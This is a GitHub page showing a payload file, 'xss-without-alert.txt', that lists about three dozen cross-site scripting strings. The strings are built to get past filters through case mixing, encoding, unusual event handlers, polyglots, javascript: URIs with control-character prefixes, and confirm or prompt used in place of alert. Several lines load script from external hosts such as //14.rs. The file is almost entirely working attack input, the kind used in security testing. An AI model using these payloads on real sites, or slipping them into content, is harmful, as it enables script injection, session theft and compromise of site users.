-
-
Notifications
You must be signed in to change notification settings - Fork 29
/
xss-without-alert.txt
36 lines (36 loc) · 1.57 KB
/
xss-without-alert.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<input value=<><iframe/src=javascript:confirm(1)
<input value=<><iframe/src=javascript:console.log(1)
<svg><script>//
confirm(1);</script </svg>
<svg%0Aonload=%09((pro\u006dpt))()//
<sCriPt x>(((confirm)))``</scRipt x>
<w="/x="y>"/OndbLcLick=`<`[confir\u006d``]>z
<deTAiLs/open/oNtoGGle=confirm()>
<scRiPt y="><">/*<sCRipt* */prompt()</script
<A href="javascript%26colon;confirm()">click
<sVg oNloaD=write()>
<sCrIpt/"<a"/srC=data:=".<a,[8].some(confirm)>
<svG/x=">"/oNloaD=confirm()//
<--`<iMG/srC=` onerror=confirm``> --!>
<SVg </onlOad ="1> (_=prompt,_(1)) "">
<!--><scRipT src=//14.rs>
<sCriPt/src=//14.rs?
<sCRIpt x=">" src=//15.rs></script>
<D3/OnMouSEenTer=[2].find(confirm)>z
<D3"<"/OncLick="1>[confirm``]"<">z
<D3/OnpOinTeReENter=confirm``>click here
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<svg><script>//
confirm(1);</script </svg>
'''"'-function(){{{callback}}}()-">\"><scrIpt>{callback}</scrIpt><aUdio src=x oNerror={callback}><"-'-function(){{{callback}}}()"'''
";a=prompt,a()//
"><img src=x onerror=prompt(1);>
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
exp/*<XSS STYLE='no\xss:noxss("*//*");
<x style="background:url('x;color:red;/*')">XXX</x>
<x style="behavior:url(%(sct)s)">
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
<a id="x"><rect fill="white" width="1000" height="1000"/></a>
javascript:confirm(1)
javascript\x0A:javascript:confirm(1)
\x1Cjavascript:javascript:confirm(1)
\xE2\x81\x9Fjavascript:javascript:confirm(1)
\xE2\x80\x85javascript:javascript:confirm(1)